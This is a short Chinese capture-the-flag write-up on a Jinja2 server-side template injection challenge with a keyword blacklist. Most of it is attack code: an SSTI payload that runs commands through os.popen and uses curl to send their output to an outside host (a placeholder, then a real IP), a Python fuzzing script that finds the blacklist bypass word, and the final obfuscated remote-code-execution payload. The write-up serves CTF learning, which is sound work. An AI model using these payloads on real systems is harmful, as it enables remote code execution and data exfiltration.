题目
image.png
过程
1.在 ssti 中过滤了后, 可以通过{%外带
{% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://xx.xxx.xx.xx:8080/?i=ls /') %}1{% endif %}由于有黑名单,这里使用得操作是利用blacklist里面最后一个进行绕过。
只要在其他语句加入他,那么就可以绕过其他语句了。
但是不知道他得blacklist顺序。
写脚本测一下
import re
import requests
from time import sleep
url = "http://f9fd3c30-c575-4a29-88a3-680ebc168df5.node3.buuoj.cn"
def gen_words():
f = open("ssti_payload.txt", "r").read()
words = re.findall("[a-zA-Z]+", f)
f = open("ssti_word.txt", "w")
res = sorted(list(set(words)))
for i in res:
f.write(i + "\n")
return res
def find_unused_word(words, payload):
used_word = list(set(re.findall("[a-zA-Z]+", payload)))
return [i for i in words if i not in used_word]
def fuzz():
payload = "{% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://xx.xxx.xx.xx:8080/?i=`ls /`') %}1{% endif %}"
words = gen_words()
unused_word = find_unused_word(words, payload)
for i in unused_word:
data = {
"name": i
}
res = requests.post(url, data=data).text
if "hello !" in res:
data = {
"name": "cla" + i + "ss"
}
res = requests.post(url, data=data).text
if "class" in res:
print(f"[*] find {i}")
sleep(0.1)
if __name__ == "__main__":
fuzz()
用了他的脚本进行黑箱测试。
发现config可用。
那么使用config来跑。
需要开靶机利用curl来带回数据。
类似反弹shell?
使用自己的靶机进行RCE即可。
最终payload:
{% iconfigf ''.__claconfigss__.__mrconfigo__[2].__subclaconfigsses__()[59].__init__.func_gloconfigbals.linecconfigache.oconfigs.popconfigen('curl http://174.0.167.222:2333/ -d `ls /|base64`') %}1{% endiconfigf %}
ssti注入深入学习
https://xz.aliyun.com/t/6885#toc-4Python
